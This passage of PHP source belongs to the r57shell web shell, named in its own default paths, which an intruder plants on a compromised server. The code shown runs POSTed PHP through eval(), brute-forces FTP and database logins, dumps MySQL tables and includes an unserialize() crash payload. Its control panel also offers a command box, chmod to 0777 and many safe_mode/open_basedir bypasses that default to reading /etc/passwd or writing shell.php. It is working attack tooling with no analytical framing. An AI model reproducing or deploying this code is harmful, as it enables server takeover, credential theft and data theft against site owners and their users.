1645 $str = 'a:100000:{s:8:"AAAABBBB";
1646a:3:{s:12:"0123456789AA";
1647a:1:{s:12:"AAAABBBBCCCC";
1648i:0;
1649}s:12:"012345678AAA";
1650i:0;
1651s:12:"012345678BAN";
1652i:0;
1653}';
1654 for ($i=0;
1655$i<65535;
1656$i++) {$str .= 'i:0;
1657R:2;
1658';
1659} $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
1660s:39:"'.$hashtable.'";
1661i:0;
1662R:3;
1663';
1664 @unserialize($str);
1665 break;
1666 } if ($_POST['cmd']=="php_eval"){ $eval = @str_replace("<?php","",$_POST['php_eval']);
1667 $eval = @str_replace("?>","",$eval);
1668 @eval($eval);
1669} if ($_POST['cmd']=="ftp_brute") { $suc = 0;
1670 if($_POST['brute_method']=='passwd'){ foreach($users as $user) { $connection = @ftp_connect($ftp_server,$ftp_port,10);
1671 if(@ftp_login($connection,$user,$user)) {echo "[+] $user:$user - success\r\n";
1672$suc++;
1673} else if(isset($_POST['reverse'])) {if(@ftp_login($connection,$user,strrev($user))) {echo "[+] $user:".strrev($user)." - success\r\n";
1674$suc++;
1675}} @ftp_close($connection);
1676 } }else if(($_POST['brute_method']=='dic') &&isset($_POST['ftp_login'])){ foreach($users as $user) { $connection = @ftp_connect($ftp_server,$ftp_port,10);
1677 if(@ftp_login($connection,$_POST['ftp_login'],$user)) {echo "[+] ".$_POST['ftp_login'].":$user - success\r\n";
1678$suc++;
1679} @ftp_close($connection);
1680 } } echo "\r\n-------------------------------------\r\n";
1681 $count = count($users);
1682 if(isset($_POST['reverse']) &&($_POST['brute_method']=='passwd')) {$count *= 2;
1683} echo $lang[$language.'_text97'].$count."\r\n";
1684 echo $lang[$language.'_text98'].$suc."\r\n";
1685 } if ($_POST['cmd']=="db_brute") { $suc = 0;
1686 if($_POST['brute_method']=='passwd'){ foreach($users as $user) { $sql = new my_sql();
1687 $sql->db = $_POST['db'];
1688 $sql->host = $_POST['db_server'];
1689 $sql->port = $_POST['db_port'];
1690 $sql->user = $user;
1691 $sql->pass = $user;
1692 if($sql->connect()) {echo "[+] $user:$user - success\r\n";
1693$suc++;
1694} } if(isset($_POST['reverse'])) { foreach($users as $user) { $sql = new my_sql();
1695 $sql->db = $_POST['db'];
1696 $sql->host = $_POST['db_server'];
1697 $sql->port = $_POST['db_port'];
1698 $sql->user = $user;
1699 $sql->pass = strrev($user);
1700 if($sql->connect()) {echo "[+] $user:".strrev($user)." - success\r\n";
1701$suc++;
1702} } } }else if(($_POST['brute_method']=='dic') &&isset($_POST['mysql_l'])){ foreach($users as $user) { $sql = new my_sql();
1703 $sql->db = $_POST['db'];
1704 $sql->host = $_POST['db_server'];
1705 $sql->port = $_POST['db_port'];
1706 $sql->user = $_POST['mysql_l'];
1707 $sql->pass = $user;
1708 if($sql->connect()) {echo "[+] ".$_POST['mysql_l'].":$user - success\r\n";
1709$suc++;
1710} } } echo "\r\n-------------------------------------\r\n";
1711 $count = count($users);
1712 if(isset($_POST['reverse']) &&($_POST['brute_method']=='passwd')) {$count *= 2;
1713} echo $lang[$language.'_text97'].$count."\r\n";
1714 echo $lang[$language.'_text98'].$suc."\r\n";
1715 } if ($_POST['cmd']=="mysql_dump") { if(isset($_POST['dif'])) {$fp = @fopen($_POST['dif_name'],"w");
1716} $sql = new my_sql();
1717 $sql->db = $_POST['db'];
1718 $sql->host = $_POST['db_server'];
1719 $sql->port = $_POST['db_port'];
1720 $sql->user = $_POST['mysql_l'];
1721 $sql->pass = $_POST['mysql_p'];
1722 $sql->base = $_POST['mysql_db'];
1723 if(!$sql->connect()) {echo "[-] ERROR! Can't connect to SQL server";
1724} else if(!$sql->select_db()) {echo "[-] ERROR! Can't select database";
1725} else if(!$sql->dump($_POST['mysql_tbl'])) {echo "[-] ERROR! Can't create dump";
1726} else { if(empty($_POST['dif'])) {foreach($sql->dump as $v) echo $v."\r\n";
1727} else if($fp ||@function_exists('file_put_contents')){foreach($sql->dump as $v){@fwrite($fp,$v."\r\n") or @fputs($fp,$v."\r\n") or @file_put_contents($_POST['dif_name'],$v."\r\n");
1728}} else {echo "[-] ERROR! Can't write in dump file";
1729} } } echo "</textarea></div>";
1730 echo "</b>";
1731 echo "</td></tr></table>";
1732 echo "<table width=100% cellpadding=0 cellspacing=0>";
1733 function div_title($title,$id) { return '<a style="cursor: pointer;
1734" onClick="change_divst(\''.$id.'\');
1735">'.$title.'</a>';
1736 } function div($id) { if(isset($_COOKIE[$id]) &&($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;
1737">';
1738 $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38');
1739 if(empty($_COOKIE[$id]) &&@in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;
1740">';
1741 return '<div id="'.$id.'">';
1742 } if(!$safe_mode){ echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
1743 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
1744 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
1745 echo $te.'</div>'.$table_end1.$fe;
1746 } else{ echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
1747 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
1748 echo $te.'</div>'.$table_end1.$fe;
1749 } echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
1750 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
1751 echo $te.'</div>'.$table_end1.$fe;
1752 if($safe_mode ||$open_basedir){ echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
1753 echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
1754 echo $te.'</div>'.$table_end1.$fe;
1755 } if($unix &&@function_exists('touch')){ echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
1756 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($dir."/r57shell.php"))) .ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>" .ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
1757 echo sr(15,"<b> or set Day".$arrow."</b>", '
1758<select name="day" size="1">
1759<option value="01">1</option>
1760<option value="02">2</option>
1761<option value="03">3</option>
1762<option value="04">4</option>
1763<option value="05">5</option>
1764<option value="06">6</option>
1765<option value="07">7</option>
1766<option value="08">8</option>
1767<option value="09">9</option>
1768<option value="10">10</option>
1769<option value="11">11</option>
1770<option value="12">12</option>
1771<option value="13">13</option>
1772<option value="14">14</option>
1773<option value="15">15</option>
1774<option value="16">16</option>
1775<option value="17">17</option>
1776<option value="18">18</option>
1777<option value="19">19</option>
1778<option value="20">20</option>
1779<option value="21">21</option>
1780<option value="22">22</option>
1781<option value="23">23</option>
1782<option value="24">24</option>
1783<option value="25">25</option>
1784<option value="26">26</option>
1785<option value="27">27</option>
1786<option value="28">28</option>
1787<option value="29">29</option>
1788<option value="30">30</option>
1789<option value="31">31</option>
1790</select>' .ws(4)."<b>Month".$arrow."</b>" .'
1791<select name="month" size="1">
1792<option value="January">January</option>
1793<option value="February">February</option>
1794<option value="March">March</option>
1795<option value="April">April</option>
1796<option value="May">May</option>
1797<option value="June">June</option>
1798<option value="July">July</option>
1799<option value="August">August</option>
1800<option value="September">September</option>
1801<option value="October">October</option>
1802<option value="November">November</option>
1803<option value="December">December</option>
1804</select>' .ws(4)."<b>Year".$arrow."</b>" .'
1805<select name="year" size="1">
1806<option value="1998">1998</option>
1807<option value="1999">1999</option>
1808<option value="2000">2000</option>
1809<option value="2001">2001</option>
1810<option value="2002">2002</option>
1811<option value="2003">2003</option>
1812<option value="2004">2004</option>
1813<option value="2005">2005</option>
1814<option value="2006">2006</option>
1815<option value="2006">2007</option>
1816<option value="2006">2008</option>
1817<option value="2006">2009</option>
1818<option value="2006">2010</option>
1819</select>' .ws(4)."<b>Hour".$arrow."</b>" .'
1820<select name="chasi" size="1">
1821<option value="01">01</option>
1822<option value="02">02</option>
1823<option value="03">03</option>
1824<option value="04">04</option>
1825<option value="05">05</option>
1826<option value="06">06</option>
1827<option value="07">07</option>
1828<option value="08">08</option>
1829<option value="09">09</option>
1830<option value="10">10</option>
1831<option value="11">11</option>
1832<option value="12">12</option>
1833<option value="13">13</option>
1834<option value="14">14</option>
1835<option value="15">15</option>
1836<option value="16">16</option>
1837<option value="17">17</option>
1838<option value="18">18</option>
1839<option value="19">19</option>
1840<option value="20">20</option>
1841<option value="21">21</option>
1842<option value="22">22</option>
1843<option value="23">23</option>
1844<option value="24">24</option>
1845</select>' .ws(4)."<b>Minute".$arrow."</b>" .'
1846<select name="minutes" size="1">
1847<option value="01">1</option>
1848<option value="02">2</option>
1849<option value="03">3</option>
1850<option value="04">4</option>
1851<option value="05">5</option>
1852<option value="06">6</option>
1853<option value="07">7</option>
1854<option value="08">8</option>
1855<option value="09">9</option>
1856<option value="10">10</option>
1857<option value="11">11</option>
1858<option value="12">12</option>
1859<option value="13">13</option>
1860<option value="14">14</option>
1861<option value="15">15</option>
1862<option value="16">16</option>
1863<option value="17">17</option>
1864<option value="18">18</option>
1865<option value="19">19</option>
1866<option value="20">20</option>
1867<option value="21">21</option>
1868<option value="22">22</option>
1869<option value="23">23</option>
1870<option value="24">24</option>
1871<option value="25">25</option>
1872<option value="26">26</option>
1873<option value="27">27</option>
1874<option value="28">28</option>
1875<option value="29">29</option>
1876<option value="30">30</option>
1877<option value="31">31</option>
1878<option value="32">32</option>
1879<option value="33">33</option>
1880<option value="34">34</option>
1881<option value="35">35</option>
1882<option value="36">36</option>
1883<option value="37">37</option>
1884<option value="38">38</option>
1885<option value="39">39</option>
1886<option value="40">40</option>
1887<option value="41">41</option>
1888<option value="42">42</option>
1889<option value="43">43</option>
1890<option value="44">44</option>
1891<option value="45">45</option>
1892<option value="46">46</option>
1893<option value="47">47</option>
1894<option value="48">48</option>
1895<option value="49">49</option>
1896<option value="50">50</option>
1897<option value="51">51</option>
1898<option value="52">52</option>
1899<option value="53">53</option>
1900<option value="54">54</option>
1901<option value="55">55</option>
1902<option value="56">56</option>
1903<option value="57">57</option>
1904<option value="58">58</option>
1905<option value="59">59</option>
1906</select>' .ws(4)."<b>Second".$arrow."</b>" .'
1907<select name="second" size="1">
1908<option value="01">1</option>
1909<option value="02">2</option>
1910<option value="03">3</option>
1911<option value="04">4</option>
1912<option value="05">5</option>
1913<option value="06">6</option>
1914<option value="07">7</option>
1915<option value="08">8</option>
1916<option value="09">9</option>
1917<option value="10">10</option>
1918<option value="11">11</option>
1919<option value="12">12</option>
1920<option value="13">13</option>
1921<option value="14">14</option>
1922<option value="15">15</option>
1923<option value="16">16</option>
1924<option value="17">17</option>
1925<option value="18">18</option>
1926<option value="19">19</option>
1927<option value="20">20</option>
1928<option value="21">21</option>
1929<option value="22">22</option>
1930<option value="23">23</option>
1931<option value="24">24</option>
1932<option value="25">25</option>
1933<option value="26">26</option>
1934<option value="27">27</option>
1935<option value="28">28</option>
1936<option value="29">29</option>
1937<option value="30">30</option>
1938<option value="31">31</option>
1939<option value="32">32</option>
1940<option value="33">33</option>
1941<option value="34">34</option>
1942<option value="35">35</option>
1943<option value="36">36</option>
1944<option value="37">37</option>
1945<option value="38">38</option>
1946<option value="39">39</option>
1947<option value="40">40</option>
1948<option value="41">41</option>
1949<option value="42">42</option>
1950<option value="43">43</option>
1951<option value="44">44</option>
1952<option value="45">45</option>
1953<option value="46">46</option>
1954<option value="47">47</option>
1955<option value="48">48</option>
1956<option value="49">49</option>
1957<option value="50">50</option>
1958<option value="51">51</option>
1959<option value="52">52</option>
1960<option value="53">53</option>
1961<option value="54">54</option>
1962<option value="55">55</option>
1963<option value="56">56</option>
1964<option value="57">57</option>
1965<option value="58">58</option>
1966<option value="59">59</option>
1967</select>' .in('hidden','cmd',0,'touch') .in('hidden','dir',0,$dir) .ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
1968 echo $te.'</div>'.$table_end1.$fe;
1969 } $select='';
1970 if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";
1971} if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";
1972} if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";
1973} if($unix &&$select){ echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
1974 echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($dir."/r57shell.php"))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
1975 echo $te.'</div>'.$table_end1.$fe;
1976 } if(!$safe_mode){ $aliases2 = '';
1977 foreach ($aliases as $alias_name=>$alias_cmd) { $aliases2 .= "<option>$alias_name</option>";
1978 } echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
1979 echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
1980 echo $te.'</div>'.$table_end1.$fe;
1981 } echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
1982 echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
1983 echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;
1984/home;
1985/tmp )");
1986 echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;
1987.php')."* ( .txt;
1988.php;
1989.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
1990 echo $te.'</div>'.$table_end1.$fe;
1991 if(!$safe_mode &&$unix){ echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
1992 echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
1993 echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;
1994/home;
1995/tmp )");
1996 echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
1997 echo $te.'</div>'.$table_end1.$fe;
1998 } echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
1999 echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";
2000 echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");
2001\r\n//readfile(\"/etc/passwd\");
2002\r\n//file_get_content(\"/etc/passwd\");
2003"));
2004 echo "</textarea>";
2005 echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2006 echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2007 echo "</div></div></font>";
2008 echo $table_end1.$fe;
2009 if($safe_mode ||$open_basedir) { echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
2010 echo "<table class=table1 width=100% align=center>";
2011 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2012 echo $te.'</div>'.$table_end1.$fe;
2013 } if(($safe_mode ||$open_basedir) &&$curl_on &&@version_compare(@phpversion(),"5.2.0")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
2014 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2015 echo $te.'</div>'.$table_end1.$fe;
2016 } if(($safe_mode ||$open_basedir) &&$mysql_on) { echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
2017 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2018 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2019 echo $te.'</div>'.$table_end1.$fe;
2020 } if(($safe_mode ||$open_basedir) &&$mssql_on) { echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
2021 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2022 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2023 echo $te.'</div>'.$table_end1.$fe;
2024 } if(($safe_mode ||$open_basedir) &&$unix &&@function_exists('mb_send_mail') &&@version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
2025 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2026 echo $te.'</div>'.$table_end1.$fe;
2027 } if(($safe_mode ||$open_basedir) &&@function_exists('imap_open') &&@function_exists('imap_list') &&@version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
2028 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2029 echo $te.'</div>'.$table_end1.$fe;
2030 } if(($safe_mode ||$open_basedir) &&@function_exists('imap_open') &&@function_exists('imap_body') &&@version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
2031 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2032 echo $te.'</div>'.$table_end1.$fe;
2033 } if(($safe_mode ||$open_basedir) &&@function_exists('copy') &&@version_compare(@phpversion(),"5.2.0")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
2034 echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
2035 echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2036 echo $te.'</div>'.$table_end1.$fe;
2037 } if(($safe_mode ||$open_basedir) &&@function_exists('ini_restore') &&@version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
2038 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2039 echo $te.'</div>'.$table_end1.$fe;
2040 } if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.0.0")<0){ echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
2041 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2042 echo $te.'</div>'.$table_end1.$fe;
2043 } if(($safe_mode ||$open_basedir) &&@function_exists('glob') &&@version_compare(@phpversion(),"5.2.2")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
2044 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test18_file'])?($_POST['test18_file']):($dir))).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2045 echo $te.'</div>'.$table_end1.$fe;
2046 } if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
2047 echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):("/tmp/test.zip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2048 echo $te.'</div>'.$table_end1.$fe;
2049 } if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
2050 echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):("/tmp/test.bzip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2051 echo $te.'</div>'.$table_end1.$fe;
2052 } if(($safe_mode ||$open_basedir) &&@function_exists('error_log') &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
2053 echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
2054 echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<?php phpinfo();
2055 ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
2056 echo $te.'</div>'.$table_end1.$fe;
2057 } if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
2058 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
2059 echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<?php phpinfo();
2060 ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
2061 echo $te.'</div>'.$table_end1.$fe;
2062 } if(($safe_mode ||$open_basedir) &&@function_exists('readfile') &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
2063 echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
2064 echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<?php phpinfo();
2065 ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
2066 echo $te.'</div>'.$table_end1.$fe;
2067 } if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.4")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
2068 echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."/test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2069 echo $te.'</div>'.$table_end1.$fe;
2070 } if(($safe_mode ||$open_basedir) &&@function_exists('symlink') &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
2071 echo "<tr><td valign=top width=70%>".$ts;
2072 echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
2073 echo $te."</td><td valign=top width=30%>".$ts;
2074 echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
2075 echo $te."</td></tr>";
2076 echo $te.'</div>'.$table_end1;
2077 } if(($safe_mode ||$open_basedir) &&@function_exists('symlink') &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
2078 echo "<tr><td valign=top width=70%>".$ts;
2079 echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
2080 echo $te."</td><td valign=top width=30%>".$ts;
2081 echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
2082 echo $te."</td></tr>";
2083 echo $te.'</div>'.$table_end1;
2084 } if((!@function_exists('ini_get')) ||@ini_get('file_uploads')){ echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
